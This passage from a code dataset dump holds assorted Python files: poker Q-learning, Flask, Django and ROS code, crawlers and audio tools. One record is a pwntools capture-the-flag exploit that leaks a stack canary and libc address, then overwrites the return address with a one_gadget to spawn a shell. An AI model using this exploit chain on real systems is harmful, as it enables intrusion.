DQLearning(10000000, 0.1, 0.9, 0.1, Q1, Q2, 1)\nQ1, Q2 = DQLearning(10000000, 0.1, 0.9, 0.1, Q1, Q2, 2)\nQ1, Q2 = DQLearning(1000000, 0.1, 0.9, 0.1, Q1, Q2, 3)\nelapsed = (time.clock() - start)\nprint(\"Time used:\",elapsed)\n\n\nfor game in range(200):\n\ttol = 0\n\tfor i in range(5):\n\t\t# print\n\t\t# print('the Game Begins')\n\t\tGrade1, Grade2, player1, player2 = Grade()\n\t\t# print('cards of Player1:')\n\t\t# print(player1)\n\t\t[level, rank] = Grade2\n\t\twinnerp = judge(Grade1, Grade2)\n\t\taction = (0, 1, 2, 3)\n\t\taction1 = {}\n\t\taction2 = {}\n\t\tpot = 20 \n\t\tdelta = 10\n\t\t#for R in range(0, 5):\n\t\tfor R in range(0, 3):\n\t\t\tQP = np.zeros(4)\n\n\t\t\taction1[R] = random.randint(0, 3)\n\t\t\tif action1[R] == 0 or action1[R] == 3:\n\t\t\t\taction2[R] = 0\n\t\t\t\treward = result(action1, action2, winnerp)\n\t\t\t\tbreak\n\t\t\t\n\t\t\tif action1[R] == 1:\n\t\t\t\tpot = pot + delta\n\t\t\t\tstate = state2[pot][R][delta][level][rank]\n\t\t\t\tfor actionp in range(0, 4):\n\t\t\t\t\tQP[actionp] = Q1[state][actionp] + Q2[state][actionp]\n\t\t\t\taction2[R] = np.argmax(QP)\n\t\t\t\tif action2[R] == 1:\n\t\t\t\t\tpot = pot + delta\n\t\t\t\tif action2[R] == 2:\n\t\t\t\t\tpot = pot + 2 * delta\n\t\t\t\t\tdelta = 2 * delta\n\n\n\t\t\tif action1[R] == 2:\n\t\t\t\tpot = pot + 2 * delta\n\t\t\t\tdelta = 2 * delta\n\t\t\t\tstate = state2[pot][R][delta][level][rank]\n\t\t\t\tfor actionp in range(0, 4):\n\t\t\t\t\tQP[actionp] = Q1[state][actionp] + Q2[state][actionp]\n\t\t\t\taction2[R] = np.argmax(QP)\n\t\t\t\tif action2[R] == 1:\n\t\t\t\t\tpot = pot + delta\n\t\t\t\tif action2[R] == 2:\n\t\t\t\t\tpot = pot + 2 * delta\n\t\t\t\t\tdelta = 2 * delta\n\n\t\t\t# print('action2:')\n\t\t\t# print(action2[R])\n\t\t\tif action2[R] == 0 or action2[R] == 3:\n\t\t\t\treward = result(action1, action2, winnerp)\n\t\t\t\tbreak \n\t\t\tif R ==2:\n\t\t\t#if R ==4:\n\t\t\t\treward = result(action1, action2, winnerp)\n\t\t\tR = R + 1\n\n\n\t\t# print('cards of Player2:')\n\t\t# print(player2)\n\t\t# print('action of player2:')\n\t\t# print(action2)\n\t\t# print('player2 wins:')\n\t\t# print(reward)\n\t\t# #print('winner:')\n\t\t# print\n\t\t# print('End of the Game')\n\t\ttol = tol + reward\n\t\ti = i + 1\n\tprint(tol)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"qq.py","file_name":"qq.py","file_ext":"py","file_size_in_byte":7497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"536392857","text":"#!/usr/bin/env python\n\nimport asyncio\n\n# this example asyncio uses the new async and await syntax\n# 1) instead of @asyncio.coroutine we use the async keyword to mark coroutine\n# functions\n# 2) instead of using 'yield from' to give back control to the event loop,\n# we use the await keyword\n\n\n# define a coroutine function, which returns a coroutine object\nasync def delayed_result(delay, result): \n await asyncio.sleep(delay)\n print(result)\n return result\n\n# get an event loop\nloop = asyncio.get_event_loop()\n\nx = loop.run_until_complete(delayed_result(1.5, 23))\n\n","sub_path":"python/async/delayed_coroutine2.py","file_name":"delayed_coroutine2.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"456046446","text":"from flask import Flask, redirect, render_template\nfrom flask.ext.compress import Compress\nimport requests\nfrom decimal import getcontext, Decimal\n\napp = Flask(__name__)\nCompress(app)\napp.config['DEBUG'] = True\napp.config['TESTING'] = True\n\n\n@app.route('/')\ndef root_redirect():\n return redirect(\"/AAPL\", code=302)\n\n\n@app.route('/', methods=['GET'])\ndef check(ticker):\n ticker = ticker.upper() # make ticker uppercase to prevent errors\n yahoo_api = requests.get(\"http://query.yahooapis.com/v1/public/yql?q=select%20*%20from%20yahoo.finance.quotes%20where%20symbol%20IN%20(%22\" + ticker + \"%22)&format=json&env=http://datatables.org/alltables.env\")\n stocktwits_api = requests.get(\"https://api.stocktwits.com/api/2/streams/symbol/\" + ticker + \".json\")\n getcontext().prec = 5\n\n def parse_yahoo(detail):\n parsed_yahoo_detail = yahoo_api.json()['query']['results']['quote'][detail]\n return parsed_yahoo_detail\n\n def parse_stocktwits_feed():\n stocktwits_feed = {}\n for i in range(0, 30): # 30 is rate limit\n if stocktwits_api:\n message = stocktwits_api.json()['messages'][i]['body']\n username = stocktwits_api.json()['messages'][i]['user']['username']\n stocktwits_feed[i] = message + \" ~\" + username\n return stocktwits_feed\n\n def get_short_term_rating():\n upside = get_upside()\n eps_upside = get_eps_upside()\n if upside and eps_upside is not None:\n upside_weight = upside * Decimal(0.75)\n eps_upside_weight = eps_upside * Decimal(0.25)\n rating = upside_weight + eps_upside_weight\n return rating\n\n def get_upside():\n target_price_parse = parse_yahoo(\"OneyrTargetPrice\")\n price = get_price()\n if target_price_parse and price is not None:\n target_price = Decimal(target_price_parse)\n upside = (Decimal(target_price - price) / price) * 100\n return upside\n\n def get_price():\n ask_parse = parse_yahoo(\"Ask\")\n bid_parse = parse_yahoo(\"Bid\")\n if ask_parse and bid_parse is not None:\n price = (Decimal(ask_parse) + Decimal(bid_parse)) / 2\n return price\n\n def get_eps_upside():\n eps_current_year_parse = parse_yahoo(\"EPSEstimateCurrentYear\")\n eps_next_year_parse = parse_yahoo(\"EPSEstimateNextYear\")\n if eps_current_year_parse and eps_next_year_parse is not None:\n eps_current_year_dec = Decimal(eps_current_year_parse)\n eps_next_year_dec = Decimal(eps_next_year_parse)\n eps_upside = ((eps_next_year_dec - eps_current_year_dec) / abs(eps_current_year_dec)) * 100\n return eps_upside\n\n def get_news():\n news = {\n \"stocktwits_url\": \"//stocktwits.com/symbol/\" + ticker,\n 'estimize_url': \"//www.estimize.com/\" + ticker,\n \"earningswhispers_url\": \"//earningswhispers.com/stocks/\" + ticker,\n \"nasdaq_url\": \"//nasdaq.com/earnings/report/\" + ticker,\n \"googlenews_url\": \"//google.com/search?q=\" + ticker + \"+stock&tbm=nws\",\n \"googlefinance_main_url\": \"//google.com/finance?q=\" + ticker,\n \"googlefinance_news_url\": \"//google.com/finance/company_news?q=\" + ticker,\n \"marketbeat_url\": \"//marketbeat.com/stocks/\" + ticker,\n \"closingbell_url\": \"//closingbell.co/stocks/\" + ticker,\n \"bloomberg_url\": \"//bloomberg.com/quote/\" + ticker + \":US\",\n \"thestreet_url\": \"//thestreet.com/quote/\" + ticker + \".html\",\n }\n return news\n\n stock = {\n \"short_term_rating\": get_short_term_rating(),\n \"symbol\": parse_yahoo(\"symbol\"),\n \"name\": parse_yahoo(\"Name\"),\n \"currency\": parse_yahoo(\"Currency\"),\n \"upside\": str(get_upside()) + \"%\",\n \"target_price\": parse_yahoo(\"OneyrTargetPrice\"),\n \"price\": get_price(),\n \"ask\": parse_yahoo(\"Ask\"),\n \"bid\": parse_yahoo(\"Bid\"),\n \"ask_real_time\": parse_yahoo(\"AskRealtime\"),\n \"bid_real_time\": parse_yahoo(\"BidRealtime\"),\n \"amount_change\": parse_yahoo(\"Change\"),\n \"percent_change\": parse_yahoo(\"ChangeinPercent\"),\n \"year_low\": parse_yahoo(\"YearLow\"),\n \"year_high\": parse_yahoo(\"YearHigh\"),\n \"year_range\": parse_yahoo(\"YearRange\"),\n \"day_range\": parse_yahoo(\"DaysRange\"),\n \"volume\": parse_yahoo(\"Volume\"),\n \"market_cap\": parse_yahoo(\"MarketCapitalization\"),\n \"average_daily_volume\": parse_yahoo(\"AverageDailyVolume\"),\n \"eps_upside\": str(get_eps_upside()) + \"%\",\n \"eps_estimate_current_year\": parse_yahoo(\"EPSEstimateCurrentYear\"),\n \"eps_estimate_next_year\": parse_yahoo(\"EPSEstimateNextYear\"),\n \"eps_estimate_next_quarter\": parse_yahoo(\"EPSEstimateNextQuarter\"),\n \"pe_ratio\": parse_yahoo(\"PERatio\"),\n \"peg_ratio\": parse_yahoo(\"PEGRatio\"),\n \"news\": get_news(),\n \"stocktwits_feed\": parse_stocktwits_feed(),\n }\n return render_template(\"index.html\", stock=stock)\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"29836244","text":"import urllib.request\nimport pymysql\n\nfrom bs4 import BeautifulSoup\n\n# 주식 사이트 크롤링하여 DB에 저장\ndef insertStock(tups):\n conn = pymysql.connect(host='localhost', user='root', password='java',\n db='python', charset='utf8')\n \n curs = conn.cursor() # java에서의 statement\n \n sql = \"\"\"insert into stock(\n s_code\n ,s_name\n ,s_price\n ,crawl_date\n )\n values (%s, %s, %s, %s)\"\"\"\n cnt = curs.executemany(sql, tups)\n \n conn.commit()\n conn.close()\n return cnt\n\n\nconn = pymysql.connect(host='localhost', user='root', password='java',\n db='python', charset='utf8')\n\nurl = \"https://vip.mk.co.kr/newSt/rate/item_all.php\"\n\nrequest = urllib.request.Request(url)\nresponse = urllib.request.urlopen(request)\nrescode = response.getcode()\nif rescode == 200:\n response_body = response.read()\n \n html = response_body.decode('euc-kr')\n soup = BeautifulSoup(html, 'html.parser')\n \n text = soup.select_one(\".t_11_black\").get_text()\n crawl_date = \"2021\"+text.replace(\".\",\"\").replace(\" \",\".\").replace(\":\",\"\")\n \n items = soup.select(\".st2\")\n \n tuts = []\n for i,item in enumerate(items):\n s_name = item.a.get_text()\n s_price = item.find_next_sibling(\"td\").get_text().replace(\",\",\"\")\n s_code = item.a['title']\n \n tuts.append((\n s_code,\n s_name,\n s_price,\n crawl_date,\n ))\n \n cnt = insertStock(tuts)\n print(\"cnt : \",cnt)\nelse:\n print(response.status_code)","sub_path":"HTLLOWPYTHON/day07/2_mycraw04_stock.py","file_name":"2_mycraw04_stock.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"603440246","text":"import subprocess\nimport wave\nimport struct\nimport numpy\nimport csv\nimport sys\nimport pyaudio\nimport pylab\nfrom pydub import AudioSegment\nfrom scipy import *\nfrom pylab import *\n\n\n\"\"\"\nsound = AudioSegment.from_mp3(\"/Users/felix/Documents/Document/zhuli.mp3\")\nsound.export(\"/Users/felix/Documents/Document\", format=\"wav\")\n\nwf = wave.open(\"/Users/felix/Documents/Document/zhuli.wav\", \"rb\")\np = pyaudio.PyAudio()\nstream = p.open(format=p.get_format_from_width(wf.getsampwidth()),\n channels=wf.getnchannels(),\n rate=wf.getframerate(),\n output=True)\nnframes = wf.getnframes()\nframerate = wf.getframerate()\nstr_data = wf.readframes(nframes)\nwf.close()\n# A new 1-D array initialized from raw binary or text data in a string.\nwave_data = numpy.fromstring(str_data, dtype=numpy.short)\nwave_data.shape = -1, 2\nwave_data = wave_data.T\n# time = numpy.arange(0,nframes)*(1.0/framerate)\n# pylab.plot(time, wave_data[0])\n# pylab.subplot(212)\n# pylab.plot(time, wave_data[1], c=\"g\")\n# pylab.xlabel(\"time (seconds)\")\n# pylab.show()\n#\nN = 44100\nstart = 0\ndf = framerate / (N - 1)\nfreq = [df * n for n in range(0, N)]\nwave_data2 = wave_data[0][start:start + N]\nc = numpy.fft.fft(wave_data2) * 2 / N\nd = int(len(c) / 2)\nwhile freq[d] > 0:\n d -= 10\n pylab.plot(freq[:d - 1], abs(c[:d - 1]), 'r')\npylab.show()\n\nimport wave\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\n\nf = wave.open('/Users/felix/Documents/Document/zhuli.wav', 'rb')\nparams = f.getparams()\nnchannels, sampwidth, framerate, nframes = params[:4]\nstrData = f.readframes(nframes)\nwaveData = np.fromstring(strData, dtype=np.int16)\nwaveData = waveData * 1.0 / (max(abs(waveData)))\n# plot the wave\ntime = np.arange(0, nframes) * (1.0 / framerate)\nplt.plot(time, waveData)\nplt.xlabel(\"Time(s)\")\nplt.ylabel(\"Amplitude\")\nplt.title(\"Single channel wavedata\")\nplt.grid('on')\n\"\"\"\n\nfilename = '/Users/felix/Documents/Document/zhuli2.wav'\nwavefile = wave.open(filename, 'r') # open for writing\n\nnchannels = wavefile.getnchannels()\nsample_width = wavefile.getsampwidth()\nframerate = wavefile.getframerate()\nnumframes = wavefile.getnframes()\n\nprint(\"channel\", nchannels)\nprint(\"sample_width\", sample_width)\nprint(\"framerate\", framerate)\nprint(\"numframes\", numframes)\n# numframes = 500000\ny = zeros(numframes)\n\nis_zero = False\nstart = 0\nfor i in range(numframes):\n # if i < 5904000:\n # continue\n # if i > 6240000:\n # break\n val = wavefile.readframes(i * 48000)\n if i % 48000 != 0:\n continue\n left = val[0:2]\n # right = val[2:4]\n v = struct.unpack('h', left)[0]\n y[i] = v\n if i % 48000 * 5 == 0:\n print(i, y[i], i / 48000)\n\n if v == 0 and not is_zero:\n # print('current frame is zero:', i)\n is_zero = True\n start = i\n elif v != 0 and is_zero:\n if i - start > 48000:\n is_zero = False\n print('end frame:', i - start, ' current:', i, 'time', i / 48000)\n\n# Fs = framerate\n# specgram(y, NFFT=1024, Fs=Fs, noverlap=900)\n# show()\n\n\n\"\"\"\nstrData = wavefile.readframes(numframes)\nwaveData = np.fromstring(strData, dtype=np.int16)\nwaveData.shape = -1,2\n# waveData = waveData.T\n# waveData = waveData * 1.0 / (max(abs(waveData)))\n# plot the wave\ntime = np.arange(0, numframes) * (1.0 / framerate)\nplt.plot(time, waveData)\nplt.xlabel(\"Time(s)\")\nplt.ylabel(\"Amplitude\")\nplt.title(\"Single channel wavedata\")\nplt.grid('on')\nplt.pause(0.001)\nplt.show()\n\"\"\"","sub_path":"tools/audio_tools.py","file_name":"audio_tools.py","file_ext":"py","file_size_in_byte":3443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"163416244","text":"#!/usr/bin/env python\n# coding=utf8\n\nimport rospy\nimport RPi.GPIO as GPIO\nimport time\nfrom time import sleep\nfrom std_msgs.msg import TwoFloat\n\n#nodo ultrasuoni che pubblica sul topic \"ultrasonic_topic\" i valori di distanza dagli ostacoli rilevati dall'ultrasuono dx e dall'ultrasuono sx.\nclass UltraSuoni(object):\n\n def __init__(self):\n self.node_rate = 10\n self.pub = rospy.Publisher(\"ultrasuoni_topic\", TwoFloat, queue_size=1)\n\t#specifichiamo che usiamo il sistema di numerazione per le GPIO definito dal chip Broadcom\n\t# BCM = Broadcom SOC channel\n GPIO.setmode(GPIO.BCM)\n GPIO.setwarnings(False)\n\t#pin “Trigger” che deve essere attivato per inviare il segnale ad ultrasuoni.\n self.GPIO_TRIGGER = 4\n\t#pin \"Echo\" che producono un impulso che si interrompe quando viene ricevuto il segnale riflesso dall’oggetto.\n self.ECHO_RIGHT = 16\n self.ECHO_LEFT = 26\n\t# settiamo il pin di trigger come output e quelli di echo come input\n GPIO.setup(self.GPIO_TRIGGER, GPIO.OUT)\n GPIO.setup(self.ECHO_RIGHT, GPIO.IN)\n GPIO.setup(self.ECHO_LEFT, GPIO.IN)\n # metodo che restituisce la distanza rilevata da uno specifico ultrasuono\n def distance(self, echo):\n # massimo tempo di attesa per la risposta in caso qualcosa si perda\n MAX_TIME = 0.04 \n # Definisco lo stato del pin relativo al trigger come alto per iniziare la misura\n GPIO.output(self.GPIO_TRIGGER, True)\n time.sleep(0.00001)\n GPIO.output(self.GPIO_TRIGGER, False)\n # ci assicuriamo che il tempo di inizio sia settato in caso di ritorno molto rapido\n start = time.time()\n\t# e impostiamo un timeout pari al tempo di inizio più il MAX_TIME\n timeout = start + MAX_TIME\n\n # imposto la linea ad input per verificare l'inizio della risposta echo\n while GPIO.input(echo) == 0 and start <= timeout:\n\t # start viene aggiornato\n start = time.time()\n\t# a stop viene assegnato il valore dell'istante in cui GPIO.input(echo) da 0 passa a 1\n stop = time.time()\n\t# il valore della variabile timeout è aggiornato al valore di stop rilevato precedentemente \n\t# a cui è sommato la variabile MAX_TIME.\n timeout = stop + MAX_TIME\n # Si attende per la fine della risposta echo\n while GPIO.input(echo) == 1 and stop <= timeout:\n\t # stop viene aggiornato \n stop = time.time()\n\t# il setup successivo mi sembra inutile\n GPIO.setup(self.GPIO_TRIGGER, GPIO.OUT)\n\t# Definisco lo stato del pin relativo al trigger come basso per fermare la misura\n GPIO.output(self.GPIO_TRIGGER, False)\n\t\n\t# si calcola il tempo trascorso come differenza tra i valori delle variabili stop e start\n elapsed = stop - start\n\t# la distanza dall'ostacolo è ottenuta moltiplicando il tempo trascorso per la velocità del suono nell'aria\n\t# diviso per 2 considerando che nel tempo trascorso sono compresi sia l'andata che il ritorno.\n dista = (elapsed * 34300) / 2.0\n time.sleep(0.02)\n return dista\n\t\n # metodo per calcolare le distanza dagli ostacoli di entrambi gli ultrasuoni utilizzando la funzione definita\n # precedentemente e pubblicarle sul topic . \n def run_distance(self):\n right_dist1 = self.distance(self.ECHO_RIGHT)\n left_dist1 = self.distance(self.ECHO_LEFT)\n\n right_dist2 = self.distance(self.ECHO_RIGHT)\n left_dist2 = self.distance(self.ECHO_LEFT)\n\t# si considerano le differenze fra i valori di due misure successive per evitare la \n\t# presenza di valori spuri restituiti casualmente dal sensore a causa della sua imprecisione.\n difference_right = abs(right_dist1 - right_dist2)\n difference_left = abs(left_dist1 - left_dist2)\n\n ultra = TwoFloat()\n\t# se le 2 misure consecutive hanno ambedue le differenze minori di una certa soglia (20) allora viene pubblicata una delle due\n\t# altrimenti si ignorano entrambe.\n if difference_left < 20 and difference_right < 20:\n ultra.left_us = left_dist1\n ultra.right_us = right_dist1\n self.pub.publish(ultra)\n rospy.loginfo('{ULTRASUONI} Distanza sx: ' + str(left_dist1) + \", Distanza dx: \" + str(right_dist1))\n else:\n pass\n\n\nif __name__ == \"__main__\":\n ultra_suoni = UltraSuoni()\n rospy.init_node(\"ultrasuoni\", anonymous=True)\n loop = rospy.Rate(ultra_suoni.node_rate)\n while not rospy.is_shutdown():\n ultra_suoni.run_distance()\n loop.sleep()\n GPIO.cleanup()\n","sub_path":"ultrasonic_node.py","file_name":"ultrasonic_node.py","file_ext":"py","file_size_in_byte":4530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"626634279","text":"from pwn import *\nr = remote('node3.buuoj.cn',25366)\n#r = process('./QCTF_2018_babycpp')\nelf = ELF('./QCTF_2018_babycpp')\nlibc = ELF('/libc-2.27.so')\n\ndef change(num):\n\tr.recvuntil('> ')\n\tr.sendline('1')\n\tr.sendline(str(num))\n\ndef get(array):\n\tr.recvuntil('> ')\n\tr.sendline('2')\n\tr.recvuntil('num:')\n\tr.sendline(array)\n\ndef unique():\n\tr.recvuntil('> ')\n\tr.sendline('3')\n\ndef get_data(l,h):\n\tif l < 0:\n\t\tl = 0x100000000 + l\n\tif h < 0:\n\t\th = 0x100000000 + h\n\tdata = h*0x100000000 + l\n\treturn data\n\nr.recvuntil('input n:')\nr.sendline('22')#22*4=88\nget('1 '*22)\nchange(28)\nunique()\nr.recvuntil('1 ')\ncanary_l = int(r.recvuntil(' '))\ncanary_h = int(r.recvuntil(' '))\ncanary = get_data(canary_l,canary_h)\nlog.success(hex(canary))\n\nleak_l = int(r.recvuntil(' '))\nleak_h = int(r.recvuntil(' '))\nleak = get_data(leak_l,leak_h)\nlog.success(hex(leak))\n\nleak_l = int(r.recvuntil(' '))\nleak_h = int(r.recvuntil(' '))\nleak = get_data(leak_l,leak_h)\nlog.success(hex(leak))\nlibc_base = leak-231-libc.sym['__libc_start_main']\nlog.success(hex(libc_base))\none = libc_base+0x4f322\none_l = one%0x100000000\nif one_l > 0x7fffffff:\n\tone_l = 0x100000000-one_l\none_h = one>>32\nlog.info(str(one_l))\nlog.info(str(one_h))\nget('1 '*22+str(canary_l)+' '+str(canary_h)+' '+'1 1 '+str(one_l)+' '+str(one_h))\nr.sendline('4')\nr.interactive()","sub_path":"pwn/qctf_2018_babycpp/fuck.py","file_name":"fuck.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"103497584","text":"# coding:utf-8\nfrom time import sleep\n\nfrom driver.Driver import Driver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport yaml\n\n\nclass BasePage(object):\n def __init__(self):\n self.driver = Driver._driver\n self.driver.maximize_window()\n # self.driver.get('https:/open.10086.cn')\n\n\n def find(self,key):\n return self.driver.find_element_by_xpath(key)\n\n\n def loadStep(self,op_path,key,**kwargs):\n file=open(op_path)\n po_data=yaml.load(file)\n po_method=po_data[key]\n for step in po_method:\n location=step['location']\n for k,v in kwargs.items():\n location=str(step['location']).replace('$%s' %k, v)\n element= self.driver.find_element_by_xpath(location)\n action= str(step['action'])\n print(action)\n if action=='click':\n sleep(2)\n element.click()\n sleep(2)\n elif action=='none':\n return element\n else:\n \"unknow commond\"\n\n\n\n\n\n # def find(self,kv):\n # return self.driver.find_element(*kv)\n\n\n def back(self):\n\n self.driver.back()\n return self\n\n def forward(self):\n\n self.driver.forward()\n return self\n\n def open_url(self, url):\n\n self.driver.get(url)\n return self\n\n\n\n\n def quitBrowser(self):\n\n self.driver.quit()\n return self\n","sub_path":"page/BasePage.py","file_name":"BasePage.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"184130427","text":"from django.shortcuts import render, redirect\nfrom django.http import JsonResponse\nfrom .models import *\nfrom .forms import *\nimport json\nfrom django.contrib.auth.models import User\n\n\ndef home(request):\n if request.session.has_key('uid'):\n\n subjects = Subject.objects.all()\n students = Student.objects.all()\n enrolls = Enroll.objects.all()\n total_courses = subjects.count()\n total_students = students.count()\n active = Enroll.objects.filter(status=\"Active\").count()\n total_enrolls = enrolls.count()\n stucourse_enrolls=\"\"\n searchfilter=\"\"\n \n if request.user.is_staff:\n userr = User.objects.get(username=request.user)\n else:\n print(request.user)\n userr = Student.objects.get(User_Name=request.user)\n stucourse_enrolls = userr.enroll_set.all()\n context = {'subjects':subjects,'students':students,'enrolls':enrolls,'total_courses':total_courses,'total_students':total_students,'active':active,'total_enrolls':total_enrolls,'userr':userr,'stucourse_enrolls':stucourse_enrolls}\n return render(request,'dash.html',context)\n else:\n return redirect('login')\n\ndef about(request):\n return render(request,'about.html')\n\n\ndef contents(request,pk):\n contents=Content.objects.get(subject=pk) \n context={'content':contents}\n return render(request,'content.html',context)\n\ndef list(request):\n subjects = Subject.objects.all().order_by('title') \n context = {'subjects':subjects} \n return render(request,'courses/list.html',context)\n\ndef contact(request):\n return render(request,'contact.html')\n \n\ndef enroll_course(request):\n data = json.loads(request.body)\n subjectid = data['subjectid']\n student = Student.objects.get(User_Name=request.user)\n subject = Subject.objects.get(id = subjectid)\n enroll = Enroll.objects.get_or_create(subject=subject,student=student,status=\"Inactive\")\n return JsonResponse(\"Enrolled a course\", safe=False) \n\ndef create_course(request):\n if request.method == 'POST':\n form = CourseForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n return redirect('home')\n else:\n form = CourseForm() \n context ={'form':form} \n return render(request,'course_form.html',context)\n\ndef update_enroll(request, pk):\n enrolls = Enroll.objects.get(id=pk)\n if request.method == 'POST':\n form = EnrollForm(request.POST, instance=enrolls)\n if form.is_valid():\n form.save()\n enrolls.delete()\n return redirect('home')\n else:\n form = EnrollForm(instance=enrolls) \n context ={'form':form} \n return render(request,'enroll_form.html',context)\n\ndef remove_enroll(request, pk):\n enrolls = Enroll.objects.get(id=pk)\n form = EnrollForm(instance=enrolls) \n if request.method == 'POST':\n enrolls.delete() \n return redirect('home')\n context = {'enrolls':enrolls, 'form':form}\n return render(request,'deleteform.html',context) \n\n\ndef remove_uenroll(request, pk):\n enrolls = Enroll.objects.get(id=pk)\n form = EnrollForm(instance=enrolls) \n if request.method == 'POST':\n enrolls.delete() \n return redirect('home')\n context = {'enrolls':enrolls, 'form':form}\n return render(request,'deleteform.html',context) \n####################################\ndef best():\n enrolls = Enroll.objects.all()\n max = 0\n sub=[]\n bestseller = \"Django\" \n for i in range(0,len(enrolls)):\n sub.append(enrolls[i].subject)\n\n counts = dict() \n for subj in sub:\n if subj in counts:\n counts[subj] += 1\n else:\n counts[subj] = 1\n for key in counts:\n if max < counts[key]:\n max = counts[key]\n bestseller = key \n return bestseller \n##############################\ndef hp(request):\n bestseller=\"Django\"\n bestsellr = Subject.objects.get(title=bestseller)\n context = {'bestsellr':bestsellr} \n return render(request,'hp.html',context)\n\ndef search(request):\n query = request.GET['query']\n search_content = Subject.objects.filter(title__icontains=query)\n context = {'search_content':search_content,'query':query}\n return render(request,'search.html',context)\n","sub_path":"Elearn/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"427430235","text":"import os,re, glob\nimport numpy as np\nimport pandas as pd\nimport logging\nimport tarfile\nfrom distutils.version import StrictVersion\n\nfrom ..config import ISOCHRONES\nfrom ..grid import ModelGrid\n\nclass ParsecModelGrid(ModelGrid):\n name = 'parsec'\n common_columns = ('Zini', 'Age', 'Mini', 'Mass','logL', 'logTe', 'logg')\n\n phot_systems = ('opt', 'gaia', 'ir', 'sdss')\n\n phot_bands = dict(opt=['Umag', 'Bmag', 'Vmag',\n 'Rmag', 'Imag','Jmag', 'Hmag', 'Kmag'],\n gaia=['Gmag', 'G_BPmag', 'G_RPmag'],\n ir=['IRAC_3.6mag ', 'IRAC_4.5mag', 'IRAC_5.8mag', 'IRAC_8.0mag', 'MIPS_24mag', 'W1mag', 'W2mag', 'W3mag', 'W4mag'],\n sdss=['umag', 'gmag', 'rmag', 'imag', 'zmag'])\n\n default_kwargs = {'version':'1.0'}\n datadir = os.path.join(ISOCHRONES, 'parsec')\n #zenodo_record = 161241\n #zenodo_files = ()#('mist.tgz',)\n #zenodo_md5 = ('0deaaca2836c7148c27ce5ba5bbdfe59',)\n #master_tarball_file = 'parsec.tgz'\n\n default_bands = ('G','BP','RP','J','H','K','W1','W2','W3','g','r','i','z')\n\n def __init__(self, *args, **kwargs):\n version = kwargs.get('version', self.default_kwargs['version'])\n version = StrictVersion(str(version))\n\n super().__init__(*args, **kwargs)\n\n @classmethod\n def get_common_columns(cls, version=None, **kwargs):\n if version is None:\n version = cls.default_kwargs['version']\n\n version = StrictVersion(str(version))\n return ('Zini', 'Age', 'Mini', 'Mass','logL', 'logTe', 'logg')\n\n\n @property\n def version(self):\n return StrictVersion(str(self.kwargs['version']))\n\n @property\n def common_columns(self):\n return self.get_common_columns(self.version)\n \n def phot_tarball_url(self, phot):\n if phot=='ir': url = 'https://www.dropbox.com/s/rlb5ifn2htbgn5l/ir.tar.gz?dl=1'\n if phot=='sdss': url = 'https://www.dropbox.com/s/6ep3g9ey8j6waxl/sdss.tar.gz?dl=1'\n if phot=='gaia': url = 'https://www.dropbox.com/s/120hxb4n88apaov/gaia.tar.gz?dl=1'\n if phot=='opt': url = 'https://www.dropbox.com/s/vdu58x4pfjbuhsz/opt.tar.gz?dl=1'\n return url\n\n @classmethod\n def get_band(cls, b, **kwargs):\n \"\"\"Defines what a \"shortcut\" band name refers to. Returns phot_system, band\n\n \"\"\"\n phot = None\n\n # Default to SDSS for these\n if b in ['u','g','r','i','z']:\n phot = 'sdss'\n band = '{}mag'.format(b)\n elif b in ['U','B','V','R','I','J','H','K']:\n phot = 'opt'\n band = '{}mag'.format(b)\n elif b in ['W1','W2','W3','W4']:\n phot = 'ir'\n band = '{}mag'.format(b)\n elif b in ('G'):\n phot = 'gaia'\n band = '{}mag'.format(b)\n elif b in ('BP','RP'):\n phot = 'gaia'\n band = 'G_{}mag'.format(b)\n\n if phot is None:\n for system, bands in cls.phot_bands.items():\n if b in bands:\n phot = system\n band = b\n break\n if phot is None:\n raise ValueError('Parsec grids cannot resolve band {}!'.format(b))\n return phot, band\n \n @classmethod\n def phot_tarball_file(cls, phot, **kwargs):\n return os.path.join(cls.datadir, '{}.tar.gz'.format(phot))\n \n def get_filenames(self, phot):\n d = os.path.join(self.datadir, '{}'.format(phot))\n if not os.path.exists(d):\n if not os.path.exists(self.phot_tarball_file(phot)):\n self.extract_phot_tarball(phot)\n\n return [os.path.join(d,f) for f in os.listdir(d) if re.search('\\.dat$', f)]\n\n @classmethod\n def get_feh(cls, filename):\n m = re.search('([mp])([0-9]{3}).', filename)\n if m:\n sign = 1 if m.group(1)=='p' else -1\n return float(m.group(2))/100. * sign\n else:\n raise ValueError('{} not a valid Parsec file? Cannnot parse [Fe/H]'.format(filename))\n\n @classmethod\n def to_df(cls, filename):\n with open(filename, 'r', encoding='latin-1') as fin:\n while True:\n line = fin.readline()\n if re.match('# Zini', line):\n column_names = line[1:].split()\n break\n feh = cls.get_feh(filename)\n df = pd.read_table(filename, comment='#', delim_whitespace=True,\n skip_blank_lines=True, names=column_names)\n df['feh']=cls.get_feh(filename)\n df['Zini'] = df['feh']#feh\n df['Age'] = np.log10(df['Age'])\n return df\n\n def df_all(self, phot, **kwargs):\n df = super(ParsecModelGrid, self).df_all(phot)\n df = df.sort_values(by=['feh','Age','Mini'])\n df.index = 